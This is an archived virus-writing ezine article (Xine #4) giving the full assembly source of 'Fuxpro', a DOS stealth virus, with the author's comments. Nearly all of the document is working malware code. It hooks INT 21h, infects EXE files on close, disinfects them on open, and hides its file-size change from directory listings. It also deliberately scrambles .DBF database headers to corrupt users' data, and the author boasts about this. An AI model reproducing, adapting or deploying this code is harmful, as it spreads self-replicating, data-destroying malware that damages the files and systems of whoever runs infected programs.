Copy Link
Add to Bookmark
Report

Xine - issue #4 - Phile 306

eZine's profile picture
Published in 
Xine
 · 7 months ago

 
/-----------------------------\
| Xine - issue #4 - Phile 306 |
\-----------------------------/


Comment ‘
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Fuxpro ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º Name : Fuxpro º
º Alias : None º
º Origin: Paraguay º
º º
º This is a stealth virus. It infects EXE files when they are º
º closed and disinfects then when they're opened.It tunnels to º
º find the original Int 21h handler, with a routine similar to º
º the one used by the Killer Virus. It marks infected files º
º setting the seconds to 62. Installs his dummy error trapper. º
º The following text is found inside the virus code: º
º º
º [FUXPRO Virus by Int13h * MaDe In PaRaGuAy] º
º º
º This message is never displayed. The virus alters the header º
º of the files with extension .DBF when they are opened. The º
º .DBF is the extension for the database files, used by Foxpro, º
º DBase and many other database oriented languages. The virus º
º reads the header and modifies completelly the header randomi- º
º cally creating a quick caos in the user's database files. º
º º
ÈÍÍ[Analysis: Mikko Hiponnen, Data Fellows Ltd's FuckProt Prof.]Íͼ
‘
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; I haven't a description of the DBF header. I just looked at ;
; some .DBF files and then I found the header too easy to under-;
; stand and to make caos with it :) but with the DBF header des-;
; cription the joke can be multiplied.Sorry 4 my poor english.;
; Note that this is one of my old viruses, I put it here to ;
; fill some spaces :) ;
; ;
; cd 13 ;
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

.model tiny
.code
jumps ; Fix it if u want. I am lazy :)
org 0h

ViralSize equ (offset MicroShit-offset Fuxpro)
ParraVir1 equ ((ViralSize+1034+15)/16)+1
ParraVir2 equ ((ViralSize+1034+15)/16)
ViralPara equ (ViralSize+15)/16

FUXPRO: call Delta
Delta: mov bx,sp
mov bp,ss:word ptr [bx]
inc sp
inc sp
sub bp,offset delta ; Get delta

mov ax,'FX' ; Are we alive?
int 21h

cmp ax,'PR'
je FuxproYaReside ; Yes, we r

push es
push ds
mov ax,3521h ; Grab int 21h's vector
int 21h
cld
mov cs:[bp+word ptr Vieja21h],bx
mov cs:[bp+word ptr Vieja21h+2],es

mov ah,52h ; Look 4 the original entry point
int 21h
lds si,es:[bx+4]
lds si,ds:[si-4]
Rastrear:
dec si
cmp word ptr ds:[si],0e18ah
jne Rastrear
cmp byte ptr ds:[si+2],0ebh
jne Rastrear
Buscar_cli:
lodsb
sub al,0fah
jnz Buscar_cli
cmp word ptr ds:[si],0fc80h
jne Buscar_cli
dec si
mov cs:[bp+word ptr Real21h],si
mov cs:[bp+word ptr Real21h+2],ds

pop ds

mov ax,ds
dec ax
mov es,ax
mov ax,es:[3]
sub ax,ParraVir1
xchg bx,ax
push ds
pop es

mov ah,4ah ; Free memory
int 21h

mov ah,48h ; Allocate mem
mov bx,ParraVir2
int 21h

dec ax
mov es,ax
mov word ptr es:[1],8 ; DOS's
inc ax
mov es,ax
xor di,di

push cs
pop ds
lea si,[bp+offset Fuxpro] ; Move virus to mem
mov cx,(ViralSize+1034)
rep movsb

int 03h ; What I am doing here? Ask TASM!

push es
pop ds
mov ax,2521h ; Hook the inty
mov dx,offset Maldita21h
int 21h

pop es

FuxproYaReside:
push es
pop ds
mov ax,es
add ax,10h ; Restore control to the hoste
add cs:[(bp+CS_IP)+2],ax

cli
add ax,cs:[(bp+SS_SP)+2]
mov ss,ax
mov sp,cs:[(bp+SS_SP)]
sti

xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
xor bp,bp

db 0ebh,0h
db 0eah
CS_IP dw offset MicroShit,0h
SS_SP dw 0,0


db ' [FUXPRO Virus by Int13h * MaDe In PaRaGuAy] '



DescuajarLaCabeceraDelMalditoArchivoTipoDBF:
mov ax,03d02h
pushf
call dword ptr cs:[Real21h] ; Open the database
xchg bx,ax

call HoOk_24h
call PointerToApocalipsis

or dx,dx
jnz Lectura ; Not too small please...

cmp ax,1666
jb Cancelar

Lectura:call PointerToGenesis
call Segmentos

mov ah,3fh
mov dx,offset Buffer ; Read 1024 bytes to our buffer
mov cx,1024
int 21h

mov si,dx
cmp byte ptr [si],3 ; It is a real .DBF? Usually begins
je Continuar ; with a 
cmp byte ptr [si],0f5h ; or a õ
jne Cancelar

Continuar:
mov si,offset Buffer ; Point to the buffer
mov cx,1024 ; Read the whole buffer
Again: dec cx
and cx,cx ; Check our counter
je Cancelar
lodsw ; Read a word
cmp ax,200dh ; It is the end of the header?
je Hallado
cmp ax,2a0dh ; Maybe the 1§ reg is deleted...
jne Again

Hallado:dec si ; Rewind a byte
mov di,si ; Save original position of EOH
mov byte ptr [si],42 ; Mark 1§ reg as deleted (02ah)
mov si,offset Buffer
add si,43 ; Go to the field descriptor
Seguimos:
mov al,cs:[si] ; Read type in AL
call Cambiador ; Do some nasty changes on the header
cmp si,di ; Still below the End of Header?
jb Seguimos

call PointerToGenesis ; G0t0 BOF

mov ah,40h
mov dx,offset Buffer ; Write the modified header
mov cx,1024
int 21h

jmp Cancelar ; And g0 0n

Cambiador:
cmp al,'C' ; Character field?
je Caracter
cmp al,'N' ; Numeric field?
je Numerico
cmp al,'D' ; Date field?
je Fecha
cmp al,'L' ; Logical field?
je Logical
ParaRetornar:
add si,32 ; Point to the next field
ret ; and return to caller


Caracter: ; Play with character fields
in al,40h ; Read random byte from port 40h
cmp al,200
ja ParaRetornar ; If above than 200 nothing to do
cmp al,150 ; If between 150-200 cut the length
ja AlaMitad ; in the middle
cmp al,100 ; If between 100-150 then substract
ja Restarlo
and al,7 ; 0-7
test al,al ; 0?
jnz Sumarlo
mov al,3 ; Then, 3
Sumarlo:add byte ptr cs:[si+5],al ; Add AL, to the length of the field
jmp short ParaRetornar ; and return
AlaMitad:
mov al,byte ptr cs:[si+5] ; The number of characters
shr al,1 ; divide it
mov byte ptr cs:[si+5],al ; and write the new size
jmp short ParaRetornar ; dirty work finished
Restarlo:
and al,7 ; 0-7
inc al ; can be 0, then INC
sub byte ptr cs:[si+5],al ; SUBstract AL from the current size
jmp short ParaRetornar


Numerico: ; Play with numeric fields
in al,40h ; Get the random byte
cmp al,166 ; If it is above than 166 return
ja Retorno
cmp al,66 ; If below than 66 then, set the random
jb Here ; number in the decimals field
Modify: mov byte ptr cs:[si],'C' ; If above than 66 convert the numeric
jmp short ParaRetornar ; field into a character one
Here: mov byte ptr cs:[si+6],al ; AL in the decimals field
Retorno:jmp short ParaRetornar


Fecha: in al,40h ; Play with Date fiels
cmp al,32 ; If random is less than 32 then
jb Modify ; converts the Date to Character
jmp short Retorno


Logical:in al,40h ; Play with Logical fields
cmp al,132
ja Retorno ; If below then 132 don't do nothing
mov byte ptr cs:[si],'M' ; Converts the Logical field to Memo
jmp short Retorno


CANCELAR:
mov ah,3eh ; Close the sucker
pushf
call dword ptr cs:[Real21h]

push cs
pop ds

mov ax,2524h ; Unhook the error handler
lds dx,dword ptr ds:[Vieja24h]
int 21h

pop es ds di si dx cx bx ax
jmp Interrupcion_21h




DeSiNfEcTaR: ; When a file is opened we check it...
push ax bx cx dx si di ds es

push ds
pop es
cld
mov di,dx
mov cx,128
mov al,'.' ; Look 4 the period
repne scasb
jne Conti

xchg si,di
lodsw
or ax,2020h
cmp ax,'bd' ; .DB?
jne Conti
lodsb
or al,20h
cmp al,'f' ; .DBF?
je DescuajarLaCabeceraDelMalditoArchivoTipoDBF

Conti: mov ax,03d02h ; Open
pushf
call dword ptr cs:[Real21h] ; Emulate the int call
xchg bx,ax

mov ax,5700h
int 21h
mov word ptr cs:[Time],cx ; Infected?
mov word ptr cs:[Date],dx
and cl,00011111b
cmp cl,00011111b
jne Closear

call PointerToApocalipsis

sub ax,26
xchg dx,ax
mov cx,ax ; Positionate pointer at EOF
mov ax,4200h ; where there is our EXE header copy
int 21h

call Segmentos

mov ah,3fh
mov dx,offset Cabecera ; Read the header in our buffer
mov cx,1ah
int 21h

call PointerToApocalipsis

sub ax,ViralSize
xchg dx,ax
mov cx,ax ; Move pointer
mov ax,4200h
int 21h

call HoOk_24h ; To prevent...

mov ah,40h
xor cx,cx ; Cut the virus from the file
xor dx,dx
int 21h

call PointerToGenesis ; Pointer to BOF

mov ah,40h
mov cx,1ah
mov dx,offset Cabecera ; Write header
int 21h

mov ax,5701h
mov cx,word ptr [Time] ; Restore date and time
and cl,11100000b
or cl,1 ; Eliminate bad seconds
mov dx,word ptr [Date]
int 21h

Closear:mov ah,3eh ; Close the sucker
pushf
call dword ptr cs:[Real21h]

PopearTodo:
push cs
pop ds

lds dx,dword ptr ds:[Vieja24h]
mov ax,2524h
int 21h
pop es ds di si dx cx bx ax
jmp Interrupcion_21h


Stealth1: ; These routines are very common...
pushf
call dword ptr cs:[Real21h]
or al,al
jne FuckingErr

push ax
push bx
push es

mov ah,62h
int 21h

mov es,bx
cmp bx,es:[16h]
jne Napue

mov bx,dx
mov al,[bx]
push ax

mov ah,2fh
int 21h
pop ax
inc al
jne FCBOrdinario
add bx,7

FCBOrdinario:
mov al,byte ptr es:[bx+17h]
and al,00011111b
cmp al,00011111b
jne Napue

cmp word ptr es:[bx+1dh],(ViralSize+1024)
ja Restar

cmp word ptr es:[bx+1fh],0
je Napue

Restar: sub word ptr es:[bx+1dh],ViralSize
sbb word ptr es:[bx+1fh],0000
and byte ptr es:[bx+17h],1

Napue: pop es
pop bx
pop ax
FuckingErr:
retf 2



; My INT 21h handler

MaLdItA21H:
cmp ax,'FX' ; TSR checking
je ChEqUeO
cmp ah,3dh ; Opening
je DeSiNfEcTaR
cmp ah,3eh ; Closing
je InFeCtAr
cmp ah,11h ; Stealth me
je Stealth1
cmp ah,12h ; Stealth me
je Stealth1
cmp ah,4eh ; Stealth me
je Stealth2
cmp ah,4fh ; Stealth me
je Stealth2
Interrupcion_21h:
db 0eah
Vieja21h dd 0
ChEqUeO:mov ax,'PR' ; You are TSR
iret


Stealth2:
pushf
call dword ptr cs:[Real21h]
jc Aqueronte

pushf
push ax
push es
push bx

mov ah,2fh
int 21h

mov ax,es:[bx+16h]
and al,00011111b
cmp al,00011111b
jne Grrr

cmp word ptr es:[bx+1ah],(ViralSize+1024)
jb Grrr

sub word ptr es:[bx+1ah],ViralSize
sbb word ptr es:[bx+1ch],0000
and byte ptr es:[bx+16h],1 ; Hide, hide, hide
Grrr: pop bx
pop es
pop ax
popf
Aqueronte:
retf 2



InFeCtAr:
cmp bx,4 ; 5 or above please
jbe AqUi

push ax bx cx dx si di ds es

call HoOk_24h

push bx
mov ax,1220h
int 2fh

mov ax,1216h
xor bh,bh
mov bl,es:[di]
int 2fh ; SFT
pop bx

cmp word ptr es:[di+29h],'EX'
jne PopAll
cmp byte ptr es:[di+28h],'E' ; .EXE?
jne PopAll

mov byte ptr es:[di+4],20h ; set attrib 20h
mov byte ptr es:[di+2],2 ; Read/write axs

mov word ptr cs:[Handle],bx
mov ax,5700h
int 21h
mov word ptr cs:[Time],cx
mov word ptr cs:[Date],dx
and cl,00011111b ; Infected?
cmp cl,00011111b
je PopAll

call Segmentos
call PointerToGenesis

mov ah,3fh
mov cx,1ah ; The header
mov dx,offset Cabecera
int 21h

mov si,dx
cmp word ptr [si],'ZM'
je IsEXE
cmp word ptr [si],'MZ'
jne PopAll ; MZ or ZM present?

IsEXE: cmp byte ptr [si+24],'@' ; Windoze sucks
jae PopAll

les ax,dword ptr [Cabecera+014h]
mov [CS_IP],ax
mov [CS_IP+2],es ; Grab important stuff
les ax,dword ptr [Cabecera+0eh]
mov word ptr [SS_SP],es
mov word ptr [SS_SP+2],ax

call Segmentos

call PointerToApocalipsis
push dx
push ax

cmp ax,1024 ; Not too small
jb PopAll

call HoOk_24h

mov ah,40h
mov bx,word ptr [Handle]
mov cx,ViralSize ; Add virus to EOF
xor dx,dx
int 21h

call PointerToGenesis

pop ax
pop dx
push dx
push ax

mov ax,word ptr [Cabecera+08h]
mov cl,4
shl ax,cl ; Modify header in the habitual way
xchg bx,ax
pop ax
pop dx
push ax
push dx
sub ax,bx
sbb dx,0
mov cx,10h
div cx
mov word ptr [Cabecera+014h],dx
mov word ptr [Cabecera+016h],ax
mov word ptr [Cabecera+0eh],ax
mov word ptr [Cabecera+010h],0

pop dx
pop ax

add ax,ViralSize
adc dx,0
mov cl,9
push ax
shr ax,cl
ror dx,cl

xchg bx,bx

stc
adc dx,ax
pop ax
and ah,1
mov word ptr [Cabecera+4],dx
mov word ptr [Cabecera+2],ax

mov ax,word ptr [Cabecera+0ah]
clc
add ax,ViralPara
jc Donotadd
mov word ptr [Cabecera+0ah],ax
Donotadd:
mov word ptr [Cabecera+0Ch],0ffffh

mov bx,word ptr [Handle]
mov ah,40h
mov cx,01ah ; Write modified header
mov dx,offset Cabecera
int 21h

db 0b9h
Time dw 0
and cl,11100000b ; Restore time & date
or cl,00011111b ; set seconds to 62
db 0bah
Date dw 0
mov ax,5701h
int 21h

PopAll: push cs
pop ds

mov ax,2524h ; Unhook int 24h
lds dx,dword ptr [Vieja24h]
int 21h

pop es ds di si dx cx bx ax
Aqui: jmp Interrupcion_21h



Hook_24h:
push es
push bx

mov ax,3524h ; Trap the trapper
int 21h
mov word ptr cs:[Vieja24h],bx
mov word ptr cs:[Vieja24h+2],es
push cs
pop ds

mov ax,2524h
mov dx,offset Manejador24h
int 21h
pop bx
pop es
ret


Manejador24h:
mov al,03 ; Nothing is wrong
iret


Segmentos:
push cs cs
pop ds es ; ES=DS=CS
ret


PointerToGenesis:
mov ax,04200h ; BOF
jmp short Desplazar
PointerToApocalipsis:
mov ax,04202h ; EOF
Desplazar:
xor cx,cx
cwd
int 21h
ret

Cabecera db 01ah dup(0) ; The copy of the header will go here

MicroShit:
Handle dw 0
Vieja24h dd 0
Real21h dd 0
Buffer db 1024 dup (0)
mov ax,4c00h
int 21h
End FUXPRO

;Virus Ú---------------¿
; Virus À---¿ |
; Virus Ü Ü | Ú----¿ |
; Virus ßÛÜ ÜÛß | | | |
;Ú-----------------¿ ßÛÜ ÜÛß | À----Ù |
;| Ú--¿ Ú-------¿ | ßÛÜ ÜÛß | |
;À-Ù | | À-Ù ßÛÜ ÜÛß | Ú---¿ Ú---Ù
; | À-----¿ ßÛÜÜÛß | | | |
; | Ú-----Ù ßÛÛß | | | À--¿ ÜßßßßßßÜ
; | | Ú-¿ Ú-¿ ÜÛÛÜ Ú--------¿ | | À--¿ | Û Û
; | | | | | | ÜÛßßÛÜ | Ú----¿ | | | | À-¿ Û Û
; | | | | | | ÜÛß ßÛÜ | | | | | | À-¿ | Û Û
; Ú-Ù À-¿ | À--Ù | ÜÛß ßÛÜ | À----Ù | | | | | ßÜÜÜÜÜÜß
; À------Ù À------ÙÜÛß ßÛÜ | Ú------Ù À-Ù À-Ù
; Ûß ßÛ | | C0d3d by Int13h
; | | M4d3 in P4r4gu4y
; | | South Am3ric4
; À-Ù




← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT